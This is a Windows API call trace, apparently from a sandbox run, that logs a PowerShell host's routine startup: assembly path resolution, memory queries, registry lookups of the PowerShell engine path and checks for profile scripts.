	[0096.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.590] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0096.595] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.596] CoTaskMemFree (pv=0x307fb0) 
	[0096.648] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0096.658] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.658] CoTaskMemFree (pv=0x307fb0) 
	[0096.660] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.660] CoTaskMemFree (pv=0x307fb0) 
	[0096.663] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.663] CoTaskMemFree (pv=0x307fb0) 
	[0096.669] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.669] CoTaskMemFree (pv=0x307fb0) 
	[0096.672] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.672] CoTaskMemFree (pv=0x307fb0) 
	[0096.672] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.672] CoTaskMemFree (pv=0x307fb0) 
	[0096.677] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0096.677] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0096.855] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0096.912] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.912] CoTaskMemFree (pv=0x307fb0) 
	[0097.176] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3081d0
	[0097.179] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3082e0
	[0097.957] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.280] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.283] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.283] VirtualQuery (in: lpAddress=0x16a620, lpBuffer=0x16b4e0, dwLength=0x30 | out: lpBuffer=0x16b4e0*(BaseAddress=0x16a000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.383] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.383] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.383] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.383] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.383] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.384] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.385] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.385] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.385] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.385] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.385] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.385] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.385] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.385] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.385] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.385] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.388] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.388] CoTaskMemFree (pv=0x3083f0) 
	[0098.442] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.442] CoTaskMemFree (pv=0x3083f0) 
	[0098.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.654] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.785] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.785] VirtualQuery (in: lpAddress=0x16b6d0, lpBuffer=0x16c590, dwLength=0x30 | out: lpBuffer=0x16c590*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.785] VirtualQuery (in: lpAddress=0x16b6d0, lpBuffer=0x16c590, dwLength=0x30 | out: lpBuffer=0x16c590*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.787] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dcd8 | out: phkResult=0x16dcd8*=0x394) returned 0x0
	[0098.787] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc5c, lpData=0x0, lpcbData=0x16dc58*=0x0 | out: lpType=0x16dc5c*=0x1, lpData=0x0, lpcbData=0x16dc58*=0x56) returned 0x0
	[0098.787] CoTaskMemAlloc (cb=0x5a) returned 0x1b8888b0
	[0098.787] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc2c, lpData=0x1b8888b0, lpcbData=0x16dc28*=0x56 | out: lpType=0x16dc2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dc28*=0x56) returned 0x0
	[0098.787] CoTaskMemFree (pv=0x1b8888b0) 
	[0098.788] RegCloseKey (hKey=0x394) returned 0x0
	[0098.788] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dcd8 | out: phkResult=0x16dcd8*=0x394) returned 0x0
	[0098.788] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc5c, lpData=0x0, lpcbData=0x16dc58*=0x0 | out: lpType=0x16dc5c*=0x1, lpData=0x0, lpcbData=0x16dc58*=0x56) returned 0x0
	[0098.788] CoTaskMemAlloc (cb=0x5a) returned 0x1b8888b0
	[0098.788] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc2c, lpData=0x1b8888b0, lpcbData=0x16dc28*=0x56 | out: lpType=0x16dc2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dc28*=0x56) returned 0x0
	[0098.788] CoTaskMemFree (pv=0x1b8888b0) 
	[0098.788] RegCloseKey (hKey=0x394) returned 0x0
	[0098.788] CoTaskMemAlloc (cb=0x20c) returned 0x2eb1b0
	[0098.788] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2eb1b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0098.789] CoTaskMemFree (pv=0x2eb1b0) 
	[0098.789] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d890, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0098.789] CoTaskMemAlloc (cb=0x20c) returned 0x2eb1b0
	[0098.789] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2eb1b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0098.789] CoTaskMemFree (pv=0x2eb1b0) 
	[0098.789] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d890, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0098.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0098.791] SetErrorMode (uMode=0x1) returned 0x1
	[0098.791] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc40 | out: lpFileInformation=0x16dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0098.791] SetErrorMode (uMode=0x1) returned 0x1
	[0098.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0098.792] SetErrorMode (uMode=0x1) returned 0x1
	[0098.792] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc40 | out: lpFileInformation=0x16dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0098.792] SetErrorMode (uMode=0x1) returned 0x1
